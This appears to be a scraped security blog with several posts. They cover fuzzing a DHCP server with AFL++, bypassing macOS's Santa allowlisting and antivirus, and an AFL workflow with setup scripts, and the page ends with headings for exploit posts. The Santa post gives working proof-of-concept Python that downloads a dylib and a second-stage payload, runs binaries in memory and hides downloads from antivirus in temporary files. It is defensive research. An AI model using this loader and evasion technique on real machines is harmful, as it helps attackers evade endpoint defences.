This code path is taken when sending a DHCP offer to the client in order to find an IP within the lease range and check whether it is on the network. It does so by sending an ARP ping to the potential address — this was causing the timeouts as there were no hosts that would respond to this ARP message and the server was waiting for a response. Since there was no need to actually have the server send the packet, I modified find_address to return the IP it picks before it calls check_ip().

Preventing Response Packets

Another bit of code I thought was likely to slow things down and that wasn’t really needed was the networking code responsible for sending responses to clients. Since there would be no real network clients to receive the packets and I wasn’t interested in fuzzing the underlying network stack, I made the following changes to preserve as much code as possible while eliminating the actual network access:


  remove the socket binding code from packet.c:raw_packet() and have it return before sending the packet
  remove the socket binding code from packet.c:kernel_packet() have it return before sending the packet


This is a snippet of the code from raw_packet() showing where I removed the call to bind() and return early before the call to sendto() is made near the end of the function:

if ((fd = socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_IP))) < 0) {
		DEBUG(LOG_ERR, "socket call failed: %s", strerror(errno));
		return -1;
	}
	
	memset(&dest, 0, sizeof(dest));
	memset(&packet, 0, sizeof(packet));
	
	dest.sll_family = AF_PACKET;
	dest.sll_protocol = htons(ETH_P_IP);
	dest.sll_ifindex = ifindex;
	dest.sll_halen = 6;
	memcpy(dest.sll_addr, dest_arp, 6);
	
	// < -- removed call to bind() -- > 

	packet.ip.protocol = IPPROTO_UDP;
	packet.ip.saddr = source_ip;
	packet.ip.daddr = dest_ip;
	packet.udp.source = htons(source_port);
	packet.udp.dest = htons(dest_port);
	packet.udp.len = htons(sizeof(packet.udp) + sizeof(struct dhcpMessage)); /* cheat on the psuedo-header */
	packet.ip.tot_len = packet.udp.len;
	memcpy(&(packet.data), payload, sizeof(struct dhcpMessage));
	packet.udp.check = checksum(&packet, sizeof(struct udp_dhcp_packet));
	
	packet.ip.tot_len = htons(sizeof(struct udp_dhcp_packet));
	packet.ip.ihl = sizeof(packet.ip) >> 2;
	packet.ip.version = IPVERSION;
	packet.ip.ttl = IPDEFTTL;
	packet.ip.check = checksum(&(packet.ip), sizeof(packet.ip));

	// RETURN BEFORE CALLING sendto()
	close(fd);
	return 1;

	result = sendto(fd, &packet, sizeof(struct udp_dhcp_packet), 0, (struct sockaddr *) &dest, sizeof(dest));
	if (result <= 0) {
		DEBUG(LOG_ERR, "write on socket failed: %s", strerror(errno));
	}




Fuzzing!

With all of the important pieces complete, it was time to put it all together and start fuzzing! All of the commands below were run from within the AFL++ docker container.

Compiling the Testcase Generator & Creating the Corpus

After dropping to a shell in the container, I changed directories to the source directory for the testcase generator and ran make using the custom Makefile I created. This produced the binary mk-testcase which I then execute to generate the testcase files.

-> % sudo docker run --security-opt seccomp=unconfined -ti -v $PWD:/src aflplusplus/aflplusplus
[afl++ dda3efae1cdf] $ cd /src/corpus-gen/src/
[afl++ dda3efae1cdf] /src/corpus-gen/src/ $ make
gcc -c -DSYSLOG -W -Wall -Wstrict-prototypes -DVERSION='"0.9.8"' -g -DDEBUG dhcpc.c
dhcpc.c: In function 'main':
dhcpc.c:256:35: warning: pointer targets in passing argument 1 of 'strncpy' differ in signedness [-Wpointer-sign]
<--- SNIP --->
gcc  mk-testcases.o clientpacket.o script.o options.o socket.o packet.o pidfile.o -o mk-testcases

# Create the corpus using mk-testcase
[afl++ dda3efae1cdf] /src/corpus-gen/src/ $ mkdir corpus && cp mk-testcases corpus/
[afl++ dda3efae1cdf] /src/corpus-gen/src/ $ cd corpus/
[afl++ dda3efae1cdf] /src/corpus-gen/src/corpus $ ./mk-testcases && rm mk-testcase
adapter index 33
adapter hardware address 02:42:ac:11:00:02
[+] creating testcase: discover 1
<--- SNIP --->
[afl++ dda3efae1cdf] $ ls
discover_1_1654463092  discover_cvendor_1654463092  request_1654463092            request_cid_mod4_1654463092
discover_2_1654463092  discover_long_1654463092     request_cid_mod32_1654463092


Compiling the Harness

In the same shell session, I then changed over to the harness source directory and ran make there to produce the udhcpd-harness binary.

# Building the harness
[afl++ dda3efae1cdf] $ cd /src/harness1/src
[afl++ dda3efae1cdf] /src/harness1/src $ CC=afl-clang-fast make
afl-clang-fast -c -DSYSLOG -static -W -Wall -Wstrict-prototypes -DVERSION='"0.9.8"' -g -DDEBUG dhcpd.c
afl-cc++4.01a by Michal Zalewski, Laszlo Szekeres, Marc Heuse - mode: LLVM-PCGUARD
SanitizerCoveragePCGUARD++4.01a
[+] Instrumented 54 locations with no collisions (non-hardened mode) of which are 1 handled and 0 unhandled selects.
afl-clang-fast -c -DSYSLOG -static -W -Wall -Wstrict-prototypes -DVERSION='"0.9.8"' -g -DDEBUG arpping.c
<--- SNIP --->
afl-clang-fast -static dhcpd-harness.o arpping.o files.o leases.o serverpacket.o options.o socket.o packet.o pidfile.o -o udhcpd-harness


Fuzzing

With that done, I put everything together in a single directory and got everything ready for the run.

# Create a directory for the fuzzing run
[afl++ dda3efae1cdf] $ cd /src
[afl++ dda3efae1cdf] /src $ mkdir -p fuzz_run/outputs
[afl++ dda3efae1cdf] /src $ mkdir -p fuzz_run/inputs

# Copy over the harness, generated corpus, and server config file
[afl++ dda3efae1cdf] /src $ cp harness1/src/udhcpd-harness fuzz_run/
[afl++ dda3efae1cdf] /src $ cp corpus-gen/src/corpus/* fuzz_run/inputs/.
[afl++ dda3efae1cdf] /src $ cp harness1/test-udhcpd.conf fuzz_run/
[afl++ dda3efae1cdf] /src $ cd fuzz_run && ls
inputs  outputs  test-udhcpd.conf  udhcpd-harness

# start afl-fuzz
[afl++ dda3efae1cdf] /src/fuzz_run $ afl-fuzz -i inputs/ -o outputs/ -- ./udhcpd-harness


And it’s off!



Summary

Overall, this process was a great learning opportunity for concepts I’m hoping to be able to transfer over to larger/more complex codebases.  Getting all of the pieces to work together was a challenge and porting over the necessary code while removing the unnecessary code was tedious and required spending a lot of time tracing execution paths, but all of this proved to be useful in the end. I’m glad I was able to validate my idea of using existing server/client code to create fuzzing harness and generate testcases but realize this approach probably becomes much more difficult with more complex targets.

I built a couple of copies of the harness using ASAN and some other features and spun of a few instances. As shown in the screenshot at the top of this post, eventually there were some crashes found in the ASAN versions. After some testing and creating another copy of the server code to use for reproducing crashes, I was actually only able to get an ASAN crash from one of those crash files. For now I haven’t dug into it much but may come back around with another post if anything interesting comes of it.

As you may be able to tell from this post, I’m far from being an expert at this stuff — in fact, quite the opposite. There may be some glaring issues with this approach and I haven’t spent enough time testing and validating everything to be completely sure I’m not doing something very wrong, so please don’t take anything I say here as coming from a source of expertise. But please do let me know about it :)

References


  Github repo for the harness+testcase generator
  AFL++ persistent mode
  udhcpd Source



osx naughtiness: bypassing santa & hiding from av
2019-01-08T00:00:00+00:00
I recently audited Santa, a binary authorization system for macOS, and discovered a technique for bypassing Santa’s controls using in-memory execution + userland-exec. I combine this with Python’s ctypes module and NamedTemporaryFile objects to create a proof-of-concept showing how this can be used to execute native code in a ‘fileless’ manner and bypass both Santa and at least one popular enterprise AV solution on macOS.

Introduction
I recently became aware of Santa, an open source binary authorization system for MacOS created by Google (though not an official Google product). I was interested in it’s design and wanted to try to find a way to bypass it’s controls. I turned out to be successful and even found an interesting way to download “known bad” files without alerting a popular antivirus solution.

The code shown below can be found here.

Santa

From the Santa Github page:


  Santa is a binary authorization system for macOS. It consists of a kernel extension that monitors for executions, a userland daemon that makes execution decisions based on the contents of a SQLite database, a GUI agent that notifies the user in case of a block decision and a command-line utility for managing the system and synchronizing the database with a server.


Santa is designed to restrict the execution of unauthorized Mach-O binary executables. Specifically, it intercepts calls to execve* at the kernel and uses filesystem metadata (filesystem id, unique file id) to identify the file being executed on the filesystem. allowlist and blocklist rules are defined using either a SHA256 hash, signing certificate hash, or file path.

The Github page also has the following under the “Known Issues” section:


  Santa only blocks execution (execve and variants), it doesn’t protect against dynamic libraries loaded with dlopen, libraries on disk that have been replaced, or libraries loaded using DYLD_INSERT_LIBRARIES.


So, the team that develops Santa acknowledges that the tool does not protect against these common library-based techniques. In any case, I wanted to find a way to execute arbitrary binaries using a different kind of technique, without the limitations of the most common libary injection attacks, without Santa detecting it.

Limitations of Common Injection Techniques on OSX

Dynamic library injection typically depends on the presence of binaries that are vulnerable to injection. Previously, attackers could depend on default macOS binaries that were vulnerable to the injection techniques described above, but SIP now prevents the use of DYLD_INSERT_LIBRARY and similar flags for Apple binaries.

Attackers must also:


  Match version numbers between legit and injected library (dyld checks for matching versions)
  Export the necessary symbols from the legit library to be used by the injected version


Finally, use of DYLD_INSERT_LIBRARY is a well-known technique, and when used on the command-line is easy to detect.

Cutting Out the Middle Man

What if we could load a dylib without the need for a vulnerable application to inject it into or any of the other limitations? We can accomplish this using Python’s ctypes module to load the library and call its functions from within Python. Pretty simple!

Here is a simple example to show this in action. This is the C code that is built as a shared library:

    #include 
    int main(void) {
        printf("Hello, from within Python\n");
    }


And here is the Python code that loads the library and calls the main() function:

    #!/usr/bin/python2.7
    import ctypes
    if '__main__' == __name__:
      mylib = ctypes.cdll.LoadLibrary("lib.dylib")
      mylib.main()


At this point we are able to execute code without the need for injectable binaries and Santa cannot detect it, but this is expected based on Santa’s known issues. Let’s take it a step further and used the shared library to execute Mach-O binaries in memory.

Bypassing Santa via In-Memory Execution

The technique of executing binaries from memory and ‘userland exec’-style attacks are not new but there is little research specific to the MacOS platform. The most informative to my own research was the work done by Stephanie Archibald on behalf of Cylance in 2017 3.

In this work, Stephanie describes the process of locating dyld in the memory space of the executing binary and using knowledge of existing structures and functionality to resolve the symbols necessary to load and execute a file image from memory. With these symbols resolved, it was then possible to load the target binary from disk and execute it from memory.

Specifically, the technique for loading and executing a binary from memory on MacOS involves the use of two deprecated methods in dyld, NSCreateObjectFileImageFromMemory and NSLinkModule. The symbols for these two functions are the ones that are resolved using the techniques defined in Stephanie’s PoC code. For a more detailed description of this technique and the overall process of accomplishing this type of execution, see Stephanie’s excellent blog post linked in the References section.

Tweaking an Existing PoC to Make a New One

I first confirmed the PoC code worked using the instructions provided and then compiled the code as a dynamic library and attempted to load it into Python using the technique described in the preceding section. This caused errors where the code in Stephanie’s PoC could not locate the necessary symbols in the symbol table.

Stephanie’s code was intended to be compiled and executed directly; for this reason, it makes some assumptions regarding the address space of the process when trying to locate the symbols for NSCreateObjectFileImageFromMemory and NSLinkModule. After some debugging and experimentation, I realized I could actually reference these functions directly in the code that would then be used as the “launcher” library and there was no need to resolve the given symbols directly from dyld in memory*. This led to a dylib that could be loaded into Python and used to execute other binaries. The code can be found here.

Below is a snippet of Python that loads this new code and uses it to execute /bin/cp:

    import ctypes
    import sys
    if '__main__' == __name__:
      mylib = ctypes.cdll.LoadLibrary("rlm.dylib")
      mylib.launch("/bin/cp")


Output:
    $ python2 poc.py
    usage: cp [-R [-H | -L | -P]] [-fi | -n] [-apvXc] source_file target_file
           cp [-R [-H | -L | -P]] [-fi | -n] [-apvXc] source_file ... target_directory


Great! We’ve now successfully loaded and executed a binary from the target system using this technique and Santa has not detected this execution of /bin/cp. The preceding examples assume the loaded dylib is already on the victim’s system, but realistically, this would likely be downloaded from a remote server. That would look like this:

    import requests, ctypes
    if '__main__' == __name__:
      r = requests.get("http://localhost:8080/rlm.dylib")
      r.raise_for_status()
      f = open("/tmp/lib", "wb")
      f.write(bytes(r.content))
      f.seek(0)
      mylib = ctypes.cdll.LoadLibrary(f.name)
      mylib.launch("/bin/cp")


Cool…now let’s get stealthier.

Getting Stealthier: Bypassing AV

Okay, so we can execute a binary on the target host. Using the same technique used to download the dylib from a remote server above, an attacker can also download the binary payload.

But wait – saving files to disk leaves traces for investigators to find. Sure, we can delete the dylib and binary from disk when we’re done, but having to provide a path for the newly created files means tipping analysts off to where our payloads where written. What if the payload is likely to trigger AV alerts? Introducing Python’s NamedTemporaryFile objects.

detected by AV (using EICAR file)

    import requests
    if '__main__' == __name__:
      # get the dylib from remote server
      r = requests.get("http://2016.eicar.org/download/eicar.com")
      r.raise_for_status()
    
      f = open("/tmp/eicsar.com", "wb")
      f.write(bytes(r.content))
      f.seek(0)
      f.close()


not detected by AV (using EICAR file)

    import tempfile
    import requests
    
    if '__main__' == __name__:
      # get the dylib from remote server
      r = requests.get("http://2016.eicar.org/download/eicar.com")
      r.raise_for_status()
      # create a NamedTemporaryFile object to hold the dylib
      f = tempfile.NamedTemporaryFile(delete=True)
      f.write(bytes(r.content))
      f.seek(0)
      f.close()


Using this technique, I confirmed that I could go undetected by at least one popular enterprise AV solution when downloading this “known bad” file. I even went so far as to download the bad file to the same location where the tempfile names point to using standard Python file objects and confirmed that this did trigger an AV alert, indicating that the use of tempfile objects in particular led to AV’s inability to detect this bad file.

This means that all an attacker has to do is handle all executions of binary payloads in this manner and they have made it more difficult to detect both the presence and execution of malicious code. Short-living files also increase difficulty of analysis. Use encrypted binaries and things become ever more complicated.

A Final PoC - Putting It All Together
    if '__main__' == __name__:
      # get the dylib from remote server
      r = requests.get("http://localhost:8080/rlm.dylib")
      r.raise_for_status()
    
      # create a NamedTemporaryFile object to hold the dylib
      f = tempfile.NamedTemporaryFile(delete=True)
      f.write(bytes(r.content))
      f.seek(0)
    
      # get the second-stage binary payload from the server
      r = requests.get("http://localhost:8080/t1")
      r.raise_for_status()
    
      # create a NamedTemporaryFile object to hold the binary
      b = tempfile.NamedTemporaryFile(delete=True)
      b.write(bytes(r.content))
      b.seek(0)
    
      # load the dylib from the tempfile and execute
      mylib = ctypes.cdll.LoadLibrary(f.name)
      mylib.launch(b.name)


Output
$ python2 poc_full.py
Hello, world!! I hope Santa doesn't catch me being naughty!


Conclusion

Put together, the techniques described here were effective at bypassing Santa and went undetected by one enterprise AV solution. This is not incredibly sophisticated, in my opinion, but it highlights the importance of layered defenses and thinking creatively about where gaps in coverage exist in the security controls we depend on.

I wasn’t able to do testing across other application allowlisting or AV solutions for MacOS so I encourage as many people as possible to test this against your AV (using poc3_undetected.py) to see if it detects the EICAR file.

Resources


  1 - Writing Badass Malware For OSX, Patrick Wardle
  2 - DLL Hijacking on OSX, Patrick Wardle
  3 - Running Executables on macOS From Memory, Stephanie Archibald



afl 0x0: my fuzzing environments and workflow
2018-06-09T00:00:00+00:00
This will be the first in a series of posts about working with afl and documenting new things I learn about using it. I thought it would be good to start this off by describing my current fuzzing workflow and how I set everything up. This took me a little while to settle into so I’m hoping it’ll be useful to others just getting started.

Workflow
I’ll begin with a quick overview of my typical fuzzing workflow, which will mention the different systems and tools involved.

Local Build and Test Run
I begin working in a local Ubuntu Server VM. The system is configured automatically using a couple of scripts and has all the necessary tools installed. I like fuzzing packages from the Ubuntu repos, so I enable the source code repositories on this system. Once I’ve selected a target, I download the source files and build them with afl. This is where I figure out the exact build recipe that is needed for the particular package and catch any build issues. When everything is finally compiled and instrumented correctly, I create a recipe script so that I can easily reproduce the build if needed. Finally, I build a small test corpus and run a short fuzzing job to see how the binary reacts to it.

Cloud Fuzzing, Round 1
When I’m ready to do the real fuzzing, I copy the files to a cloud storage bucket, launch a new VM instance in the cloud and configure it using the same script used on the local VM, download the files to this new instance, and start fuzzing. This VM is privisioned with high CPU and memory to improve fuzzing performance. Multiple instances of afl are run to take advantage of these resources.

After the fuzzers have run long enough (at least long enough for the master to have completed one cycle), I stop the jobs and prepare to consolidate and minimize the resulting testcase files in the queue/ directory of each fuzzer that ran in the job.

Testcase Corpus Consolidation and Minimization
The files in each fuzzer’s queue may contain other bugs that weren’t uncovered in the first run. There will probably be lots of overlap between these these files, so I consolidate them into a single directory and run them through afl-cmin. This allows me go for another round of fuzzing with these testcases if I think it’s worth it.

Once this is done, I delete the queues for each fuzzer and the directory that contained the combined queues to save space. I then create an archive of the target directory with the new files and upload them to the cloud storage bucket.

Cloud Fuzzing, Round N
If it feels like it may be fruitful, I’ll then replace the queues for each fuzzer with the minimized queue and go for another round of fuzzing. I do this as many times as I see fit, minimizing the queues and uploading the new files to the storage bucket for each run.

Crash Minimization and Triage
Once I’m satisfied with the fuzzing, I prepare to analyze the resulting crash files.

I download the archives for each fuzzing run to a cloud instance and perform a similar operation as above to minimize the crashing testcases for each fuzzing run (combining the crash directories of each fuzzer and running them through afl-cmin). This can potentially reduce thousands of crash files down to under a hundred. When this is complete, I upload these new files to the storage bucket and then download them to my local VM. I then move on to analyzing the crash files to determine the root cause of the crashes and potential exploitability.

This process is much too involved to go into in this post, but I do plan on writing a post as part of this series that will deep dive into my crash triage process.

Components
The setup described above consists of the following components:


  fuzzy-scripts: collection of scripts for initializing the environment and installing afl, as well as some utility scripts
  Local VM instance: used for initial building, instrumentation, and testing fuzzing.
  Cloud VM instance: used for longer fuzzing sessions once all of the parameters are figured out
  Cloud storage bucket: centralized storage location for fuzz job files


fuzzy-scripts
fuzzy-scripts is a collection of scripts I wrote to automate the installation of afl and configuration of the environment. Most of the work is done by two scripts, setup.sh and dbg-repos.sh. Both the local VM instance and cloud instance are configured using the same scripts to create mirror environments.

Another script included with fuzzy-scripts is init-target.sh, located in the tools/ directory. This script creates a directory under ~/targets for a new fuzzing target. Inside, it creates the directories for testcases and findings used during the fuzzing process. This script is meant to eliminate having to repeat those commands every time.

setup.sh
This script does most of the heavy lifting. It begins by installing necessary packages and dependencies:

# update sources and install dependencies
echo "[+] Installing dependencies and making config changes for afl..."
sudo apt-get update
sudo apt-get install -y clang-3.8 build-essential llvm-3.8-dev gnuplot-nox
sudo update-alternatives --install /usr/bin/clang clang `which clang-3.8` 1
sudo update-alternatives --install /usr/bin/clang++ clang++ `which clang++-3.8` 1
sudo update-alternatives --install /usr/bin/llvm-config llvm-config `which llvm-config-3.8` 1
sudo update-alternatives --install /usr/bin/llvm-symbolizer llvm-symbolizer `which llvm-symbolizer-3.8` 1


After this, it enables coredumps, followed by downloading and installing the standard afl tools, as well as afl-clang-fast and afl-clang-fast++:

# ensure system doesnt interfere with dumps (has to be repeated after reboots)
echo "[+] Enabling core dumps..."
echo core | sudo tee /proc/sys/kernel/core_pattern

# get and build afl
echo "[+] Installing American Fuzzy Lop..."
cd tools
wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
tar xvf afl-latest.tgz &> /dev/null
cd afl-2*
make
make -C llvm_mode
sudo make install
echo "Done!"


Finally, it installs a gdb, pwndbg, and a few other useful tools in case they aren’t already present:

# other installs
echo "[+] Installing gdb and pwndbg..."
sudo apt-get install -y gdb 
git clone https://github.com/pwndbg/pwndbg.git
cd pwndbg 
./setup.sh
echo "Done!"

echo ""
echo "[+] Installing some other tools in case they aren't already..."
sudo apt-get install -y yasm vim git 
echo "Done!"
echo ""


dbg-repos.sh
This script configures the debug-sym repositories for Ubuntu. These repos contain debug symbols for most packages avilable through apt, which can be a huge help when triaging bugs later on.

echo "Adding debug symbol repos at file /etc/apt/sources.list.d/ddebs.list"
echo "deb http://ddebs.ubuntu.com $(lsb_release -cs) main restricted universe multiverse
deb http://ddebs.ubuntu.com $(lsb_release -cs)-updates main restricted universe multiverse
deb http://ddebs.ubuntu.com $(lsb_release -cs)-proposed main restricted universe multiverse" | \
    sudo tee -a /etc/apt/sources.list.d/ddebs.list

echo "Importing signing key..."
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 428D7C01 C8CAB6595FDFF622

echo "Updating repos..."
sudo apt-get update


tools/cmin.sh
This script automates the process of consolidating and minimizing the resulting testcases from each fuzzer’s queue and minimizing the corpus with afl-cmin. The code is shown below:

#!/usr/bin/env bash

if [ "$#" -ne 1 ]; then
    echo "[!] usage: ./cmin.sh "
    echo ""
    echo "> the fuzzer basename is the name you assigned the your master and slave fuzzers, minus the number."
    echo "> the target command string passed to afl must be double-quoted "
    exit
fi

fuzzer_name=$1
cd syncdir
mkdir combined_queue
cp "${fuzzer_name}"*/queue/* combined_queue/


tools/init-target.sh
This is a simple convenience script that sets up the directory structure I use for each new target. It creates a new directory under ~/targets/ with the name provided. This directory contains three  directories:


  src/: a place to keep the source code of the target program
  inputs/: the directory for testcase files fed to the fuzzer
  syncdir/: the directory where the fuzzers will output their results


This script also copies the cmin.sh script to the new target directory, since the minimization script expects to be run from this location.

Local and Cloud Environments
As mentioned above, I start off working in a local VM and then transition over to a cloud instance for the actual fuzzing.

The local fuzzing VM is used for target selection and doing the initial build and instrumentation of the target. This VM isn’t very powerful because it doesn’t really need to be. I use these specs for a VM on my laptop:

- 2 CPUs
- 20GB HDD
- 4GB RAM
- Ubuntu Server 16.04 64-bit


Once the VM is created, I do a clean install of the OS and take snapshot for easy redeployment in case something goes wrong. Then I use the scripts from above to do the configuration and installation of tools.

Since the cloud instance is responsible for running the real fuzzing job, I provision it with more resources. There are times when I want to use different specs for the cloud VM, so I create instance templates with the following specs:

- 4 CPU
- 8GB RAM 
- 20GB HDD
- Ubuntu Server 16.04 64-bit

- 8 CPU
- 16GB RAM 
- 20GB HDD
- Ubuntu Server 16.04 64-bit

- 16 CPU
- 32GB RAM 
- 20GB HDD
- Ubuntu Server 16.04 64-bit


These VMs are configured with the same scripts as the local VM.

Cloud Storage
The cloud storage bucket is used as a central storage point for the fuzzing files. After everything has been successfully built in the local VM and I’ve tested fuzzing, I copy the files to the storage bucket, where they will later be downloaded to the cloud instance for the full fuzzing job. I also store the resulting files for each round of fuzzing and crash case minimization in the cloud bucket.

Conclusion
There it is! Nothing too complicated or special happening, but this workflow lets me figure out all of the details locally and then get right to work in the cloud. I hope it will be helpful to anyone out there still figuring out their own process. In the next post I’ll write about selecting interesting targets and where to find them.

hyprblog

chonked pt.2: exploiting cve-2023-33476 for remote code execution

Introduction

review of http chunked encoding

summary of the bug and initial primitive

Understanding the Corruption Mechanism

effects of memmove()

visualizing the operation

controlling the shift distance

example

heap-based corruption

Heap Feng Shui

controlling allocations

holding request allocations

getting sequential allocations

separating the connection and request buffer allocations

the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap

putting it all together

Exploit: Arbitrary R/W via Tcache Poisoning for RCE

setup: building the target

tcache poisoning tl;dr

constructing the fake chunk for poisoning

heap preparation

poisoning the free’d chunk

corrupting the GOT

reverse shell stager and listener

popping a shell

Wrapping Up

exploitability in the Real World(TM)

arm32 exploit?

Resources

chonked pt.1: MiniDLNA 1.3.2 HTTP Chunk Parsing Heap Overflow (CVE-2023-33476) Root Cause Analysis

Introduction

Vulnerability Summary

Affected Versions

Minimal Testcase to Trigger the Bug

Discovery

Root Cause Analysis

Initial Request Handling: Process_upnphttp()

BUG: Incorrect Chunk Size Validation in ParseHttpHeaders()

OOB read/write on chunk sizes > request length in ProcessHttpQuery_upnphttp()

Conclusion

Suggested Fix

Disclosure Timeline

Exploitation

Reference/Links

RAX30 Patch Diff Analysis & Nday Exploit for ZDI-23-496

Overview

Analysis

ZDI-23-499: soap_serverd stack-based buffer overflow

ZDI-23-496: lighttpd Misconfiguration RCE

Comparing Config Changes

Conclusions Based on Changes

Exploits: ZDI-23-496 Lighttpd Misconfiguration

Local File Inclusion via Symlink

RCE via PHP Files

Conclusion

References/Links

nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)

Discovery

Root Cause Analysis

Exploit: Leaking the Stack Canary

Constraints: Field Length Limit

Constraint: Additional %s format strings

Constraints: FORTIFY_SOURCE=2

a quick detour: tl;dr on FORTIFY_SOURCE=2

Exploit: Leaking the Canary

Facedancer Script

Code Exec?

Reference/Resources

nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)

introduction

initial analysis

finding the vulnerability

tracing the data from sink → source

summary of the analysis

testing setup

debugging

payload delivery

crafting payloads

effects of `memmove()`

Listening Processes (`netstat -lp`)